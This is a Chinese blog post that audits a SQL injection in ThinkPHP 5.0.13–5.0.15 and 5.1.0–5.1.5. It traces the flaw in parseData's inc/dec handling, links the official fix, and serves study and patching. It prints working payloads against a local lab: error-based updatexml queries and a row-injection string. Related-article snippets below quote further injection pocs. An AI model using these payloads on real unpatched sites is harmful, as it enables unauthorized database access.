ThinkPHP5.0.15代码审计【SQL注入】

最新推荐文章于 2024-08-11 19:27:09 发布
最新推荐文章于 2024-08-11 19:27:09 发布
阅读量574 收藏
点赞数 2
分类专栏: 代码审计
DMIND
本文链接:https://blog.csdn.net/weixin_45669205/article/details/116401771
版权

ThinkPHP SQL注入 漏洞分析 修复策略 安全编程
关键词由CSDN通过智能技术生成

文章目录

简介

parseData() 这个方法中出现对dec、inc两种情况的考虑不周从而拼接导致的SQL注入(Insert方法注入)
漏洞利用版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5

环境搭建

到官网下载TP 5.0.15的源码

新建一个数据库,这里我建立了一个tpdemo库,其中有个users表

composer.json填写版本
在这里插入图片描述
application/index/controller/Index.php中配置:

public function index()//控制方法
{
   $username = request()->get('username/a');
   db('users')->insert(['username'=>$username]);
   return 'Update success';
}

application/database.php配置数据库信息
在这里插入图片描述
application/config.php开启调试模式

'app_debug'              => true,
'app_trace'              => true,

先给出payload:

http://127.0.0.1/thinkphp_5.0.15_full/Index.php?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1 
http://127.0.0.1/thinkphp_5.0.15_full/Index.php?username[0]=dec&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

在这里插入图片描述

分析

在这里插入图片描述

首先看index控制器,username这个参数要接收数组形式!所以我们写成了get('username/a'),注意后面的/a就是要求传入数组形式。数组形式是后面利用的前提。

$username经过 request()->get('username/a');后得到一个数组:
在这里插入图片描述

接着进入 insert()方法,会跳转到thinkphp/library/think/db/Query.php的insert()方法
在insert方法中主要是这几行代码:分析了我们有用到什么表达式、将数据整合成一个数组$data,然后生成SQL语句并执行
在这里插入图片描述

$options = $this->parseExpress();实际得到我们的表名,其他的用不着
在这里插入图片描述
$data = array_merge($options['data'], $data);将参数数组 合并成一个数组
在这里插入图片描述
$sql = $this->builder->insert($data, $options, $replace);这是生成SQL语句的,但这行代码又调用了insert方法,这里看的时候有点疑惑$this->builder是哪个类的对象,看大佬说: Mysql 类继承于 Builder 类,即上面的 $this->builder->insert() 最终调用的是 Builder 类的 insert 方法。

既然这样我们跟进到thinkphp/library/think/db/Builder.php/下Builder 类的insert()方法看看如何生成SQL语句
在这里插入图片描述
先跟进看parseExpress()这个方法,其中$data的key值和value值都被赋值给相应变量,当$val是数组、且$val[0]是inc或者dec时就会进行拼接,返回$data=$val[1] + $val[2],而这个$data是我们insert进去的数据,因此可以想到在INSERT....VALUE()这个SQL语句VALUE()中插入我们的恶意数据!这也回应一开始为什么需要传入数组形式了
在这里插入图片描述

执行完parseData(),回到insert方法中此时的$dataupdatexml(1,concat(0x7,user(),0x7e),1)+1
在这里插入图片描述
然后通过str_replace()函数对既定表达式$insersql进行数据替换
在这里插入图片描述

最终SQL语句:
INSERT INTO `users` (`username`) VALUES (updatexml(1,concat(0x7,user(),0x7e),1)+1)

既定INSERT语句:
'%INSERT% INTO %TABLE% (%FIELD%) VALUES (%DATA%) %COMMENT%';

得到SQL语句后回退到thinkphp/library/think/db/Query.php,最后通过execute()执行就触发了SQL注入
在这里插入图片描述

payload:
http://127.0.0.1/thinkphp_5.0.15_full/Index.php?username[0]=inc&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1 
http://127.0.0.1/thinkphp_5.0.15_full/Index.php?username[0]=dec&username[1]=updatexml(1,concat(0x7,user(),0x7e),1)&username[2]=1

当然还可以不利用报错而是直接向数据库中插入数据:例如我们插入username为66的数据

payload:
username[0]=inc&username[1]=66),(1&username[2]=1 

SQL语句中:
INSERT INTO `users` (`username`) VALUES (66),(1+1)

七月火师傅的攻击流程图:
在这里插入图片描述

修复

我们到GitHub上看看官方是如何修复的:
https://github.com/top-think/framework/compare/v5.0.15...v5.0.16
找到Builder.php ,发现是在增加了检查了$key是否等于$val[1]的步骤
在这里插入图片描述

D.MIND
关注
专栏目录
ThinkPHP v5.0.15 完整版
02-06
软件介绍 ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,经历了三年多发展的同时,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和 改进,众多的典型案例确保可以稳定用于商业以及门户级的开发。 ThinkPHP借鉴了国外很多优秀的框架和模式,使用面向对象的开发结构和MVC模式,采用单一入口模式等,融合了Struts的 Action思想和JSP的TagLib(标签库)、RoR的ORM映射和ActiveRecord模式,封装了CURD和一些常用操作,在项目配置、类 库导入、模版引擎、查询语言、自动验证、视图模型、项目编译、缓存机制、SEO支持、分布式数据库、多数据库连接和切换、认证机制和扩展性方面均有独特的 表现。 使用ThinkPHP,你可以更方便和快捷的开发和部署应用。当然不仅仅是企业级应用,任何PHP应用开发都可以从ThinkPHP的简单 和快速的特性中受益。ThinkPHP本身具有很多的原创特性,并且倡导大道至简,开发由我的开发理念,用最少的代码完成更多的功能,宗旨就是让WEB应 用开发更简单、更快速。为此ThinkPHP会不断吸收和融入更好的技术以保证其新鲜和活力,提供WEB应用开发的最佳实践! ThinkPHP遵循Apache2开源许可协议发布,意味着你可以免费使用ThinkPHP,甚至允许把你基于ThinkPHP开发的应用开源或商业产 品发布/销售。 ThinkPHP v5.0.15 更新日志: 改进View类 改进chunk方法 改进模板引擎的表达式语法 改进自关联查询多级调用问题 关联定义增加`selfRelation`方法用于设置是否自关联 改进file类型的缓存`inc`和`dec`方法不改变缓存有效期 改进软删除 支持设置`deleteTime`属性关闭 改进`union`查询 改进查询缓存 优化File缓存自动生成空目录的问题 改进日志写入并发问题 修正`MorphTo`关联 改进`join`自关联查询 改进`case`标签解析 改进Url类对`url_convert`配置的支持
php 远程执行sh,ThinkPHP 5.* 远程命令执行漏洞复现与GETSHELL
weixin_35067976的博客
03-23 237
Thinkphp 下载地址:http://www.thinkphp.cn/donate/download/id/1125.html ThinkPHP5.0.15完整版本地环境搭建phpstudy ,在WWW根目录建立文件夹放入代码如果想要开启 debug 报错 在目录建立 文件里面的内容写: APP_DEBUG = true成功开启debug报错漏洞复现:漏洞exp: index...
ThinkPHP5.0.15漏洞解析及SQL注入
最新发布
m0_70638961的博客
08-11 346
通过查看5.0.155.0.16版本的对比,可以看到16版本对在Builder.php里面对数据库的增减做了修正,所以可以15版本的漏洞就存在在这里。这里的代码用的拼接的方式,就可以尝试使用报错注入来实现。到了这里就发现,我们注入的三个值在这里派上了用场,val[1]就是注入的报错语句,这里走完,返回的就是报错注入语句+1,接下来我们继续走,一直走到这里。为了清楚代码是怎么走的,我们可以在insert()打一个断点,重新提交后就可以进入断点了,这里我们可以看到username有三个值。
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析
11-28 1182
ThinkPHP5.0.15_parseData造成SQL注入漏洞分析 ThinkPHP5.0.13-ThinkPHP5.0.15/ThinkPHP5.1.0-ThinkPHP5.1.5 漏洞代码<?php namespace app\index\controller; class Index{ public function index(){ $username = request()->get('username\a'); db('users')-
Thinkphp5.0.15 SQL注入
feng的博客
03-05 1789
前言 刚把tp5的RCE给审的差不多了,审的很爽,接下来审一下thinkphp5各个版本的SQL注入。 代码不用说了,composer先下载下来。 composer create-project topthink/think=5.0.15 thinkphp5.0.15 下载来的%99都是版本不对,改一下composer.json 然后composer update就可以了。 index控制器那里写一下insert语句: class Index { public function index()
13-PHP代码审计——ThinkPHP5.0.15聚合查询漏洞分析
网络安全
05-06 607
漏洞环境: ThinkPHP5.0.15 <= 漏洞影响版本 poc: id),(select sleep(5)),(username id),(updatexml(1,concat(0x7,database(),0x7e),1) 什么是聚合查询? mysql数据库中有一张users表用于存储用户信息,假如我们想要查询users表中有多少个用户的记录,可以直接执行select * from users sql语句来获取用户的个数记录,但是这样做的效率非常低,因为我们只想..
12-PHP代码审计——ThinkPHP5.0.15 update注入分析
网络安全
05-06 831
环境: thinkphp_5.0.15_full poc: level[0]=inc&level[1]=updatexml(1,concat(0x7,user(),0x7e),1)&level[2]=1 下载ThinkPHP5.0.15解压到www.tptest.com目录下,并在phpstudy中将域名站点的网站目录改为ThinkPHP5.0.15的public目录。 在application目录的config.php文件中开启跟踪调试模式,如下所示: // 应.
ThinkPHP 开发框架 v5.0.15 核心版
11-25
7. **自动化测试**:通过`.travis.yml`文件,可以看到ThinkPHP 5.0.15对持续集成的支持,开发者可以利用这个特性进行自动化测试,确保代码质量。 8. **Composer支持**:`composer.json`文件表明ThinkPHP 5.0.15遵循...
ThinkPHP 开发框架 v5.0.15 完整版
11-07
1. **面向对象设计**:ThinkPHP 5.0.15完全基于面向对象编程,遵循SOLID原则,支持命名空间,使得代码结构更加清晰,可维护性更强。同时,它引入了依赖注入容器,允许开发者灵活地控制对象的创建和依赖关系,提高了...
对于ThinkPHP框架早期版本的一个SQL注入漏洞详细分析
10-25
官方文档中提到,通过查询条件预处理能够有效防止SQL注入,因为预处理会将SQL语句与参数分离,由数据库系统先进行编译,再将参数传入,从而避免了动态执行恶意构造的SQL代码。但是,如果使用ThinkPHP的API时采用了...
thinkPHP框架中执行原生SQL语句的方法
10-19
ThinkPHP框架提供了方便的接口来执行这些原生SQL,这使得开发者能够灵活地利用数据库的强大功能。本篇文章将深入探讨如何在ThinkPHP中执行原生SQL语句,并对比`query()`和`execute()`这两个方法的使用场景和差异。 ...
[复现]Thinkphp5系列漏洞
kuuhh的博客
08-05 7035
SQL注入 parseData方法 本次漏洞存在于 Builder 类的 parseData 方法中。由于程序没有对数据进行很好的过滤,将数据拼接进 SQL 语句,导致 SQL注入漏洞 的产生。漏洞影响版本: 5.0.13<=ThinkPHP<=5.0.15 、 5.1.0<=ThinkPHP<=5.1.5 。 测试代码,我这里用的版本是 ThinkPHP 5.0.15 public function index() { update / insert 方法
ThinkPHP 系列漏洞
SHELLCODE_8BIT的博客
11-18 3769
所有 sql 注入漏洞均在 library/think/db/Builder.php 文件中。1、thinkphp5 SQL注入1漏洞影响版本: 5.0.13
thinkphp--普通方法与静态方法调用区别
张默的博客
04-24 3171
1. 普通方法 创建类Demo,并定义一个公共普通方法:test1( ) 调用语法: //1. 创建对象 对象变量名 = new 类名 ; //2 调用方法 对象变量 -> 普通方法() ; 例如: $obj = new Demo(); echo $obj -> test2(); 也可以将调用普通方法的二步合并为一步: (new 类名) -&gt...
分析ThinkPHP5的源码(1) : 类的自动加载
黎明强的博客
10-15 1703
Composer 下载的源码,每个框架它都必须都有一个“类的自动加载”机制 ,我们都知道PHP引入文件是需要 、 才能使用别的类文件中的方法。比如我需要写一个公共文件 model.php 但是!如何当公共类库文件很多的时候,每次都需要手动引入,就显得非常麻烦,不利于/不方便维护管理。 所以PHP引入了一个 的类自动加载,TP框架就是借助了 来完成类的自动加载。学习框架源码的第一步,先找到入口文件 ,然后一步步跟进流程,看下代码执行的过程。 打开Base.php ,第16行就会去加载 文件 (就是
thinkphp 请求
mySoul
05-30 296
请求对象由 think\Request 负责 只需要依赖注入即可 请求对象 构造方法注入即可 public function __construct(Request $request) { $this->request = $request; } 请求信息 <?php namespace app\index\controller; use think\exc...
一次复现审计ThinkPHP5.0.15版本的sql注入
p_utao的博客
01-22 316
关于tp框架 ThinkPHP 是一个免费开源的,快速、简单的面向对象的 轻量级PHP开发框架 ,创立于2006年初,遵循Apache2开源协议发布,是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,也注重易用性。并且拥有众多的原创功能和特性,在社区团队的积极参与下,在易用性、扩展性和性能方面不断优化和改进,已经成长为国内最领先和最具影响力的WEB应用开发框架,众多的典型案例确保可以稳定用于商业以及门户级的开发。
ThinkPHP-漏洞分析集合
Fly_鹏程万里
12-13 6369
前言 说好的和组内大佬一起审cms,搞着搞着就走上了分析ThinkPHP的道路。 分析了这两年的一些ThinkPHP注入漏洞,希望找到一些共性。有tp5的也有tp3的。 至于最终的总结,由于能力问题也就不在这献丑了,大师傅们肯定有自己更好的见解。 比如phpoop师傅的 ThinkPHP3.2.3框架实现安全数据库操作分析 ThinkPHP 5.0.9 鸡肋SQL注入 虽说鸡肋,但是原...
thinkphp mysql自定义函数_ThinkPHP中获得一条数据表信息自定义函数public function get()...
weixin_29415429的博客
02-22 384
/* 一般情况 */public function get(){return $this->where("id=".(int)I('id'))->find();}/* 获取信息后拆分多图 */public function get(){$m = M('products');$rs = $m->where("productId=".(int)I('id'))->find();...
ThinkPHP3.2.3 SQL注入分析:update注入详解
在IT安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过输入恶意的SQL代码来操纵数据库。这篇关于"think3.2.3_sql注入分析1"的文章聚焦于ThinkPHP 3.2.3版本中存在的一个SQL注入漏洞。ThinkPHP是一个广泛使用...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值